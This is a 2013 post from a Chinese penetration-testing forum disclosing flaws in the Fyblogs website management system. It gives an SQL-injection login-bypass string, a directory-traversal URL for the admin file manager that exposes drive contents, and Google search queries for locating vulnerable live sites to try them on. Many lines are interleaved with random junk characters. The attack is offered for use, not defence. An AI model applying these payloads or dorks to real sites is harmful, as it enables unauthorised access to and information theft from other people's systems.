中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]
作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过0 I1 _% a  E- u5 ^. t
- B  i* }: j" x8 s9 P
简要描述:
2 [* K! [+ }" C, N6 Q1 d" ]4 I- G5 m4 Y8 u
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!: t/ e. j& m) r5 G- O$ }

) K! G  T- N9 q0 h详细说明:
& G0 U9 V6 ?; c6 X5 m1 J2 k0 D; J8 A; S1 u, Y+ j# _
后台万能密码 'or'='or'9 X- Q. b4 ~! Z6 d
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% i2 b& I: s) [admin/uploadfile.asp?currentFolder=/upfiles/../
( g3 i1 N& `' t- a( v& e
. F0 g9 ^- r' s7 z, P/ T  u漏洞证明:* O* l& v7 e: c6 e- s5 G, c0 B2 q

8 W* s4 C" C5 U5 M5 m谷歌:inurl:type.asp?id=1 新闻中心
6 l6 l4 \5 O/ v3 \) Z- G6 N# J或者 :inurl:download_ok.asp?
$ i7 G% q* P/ F  }% E5 z7 j- ~9 b2 r
可以测试
# A1 d/ x3 `" u: T; K. T; y
" ?) v1 ]  n8 V  N' Y$ _6 ]
0 }$ g, }: G% O3 D% V9 i2 h



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2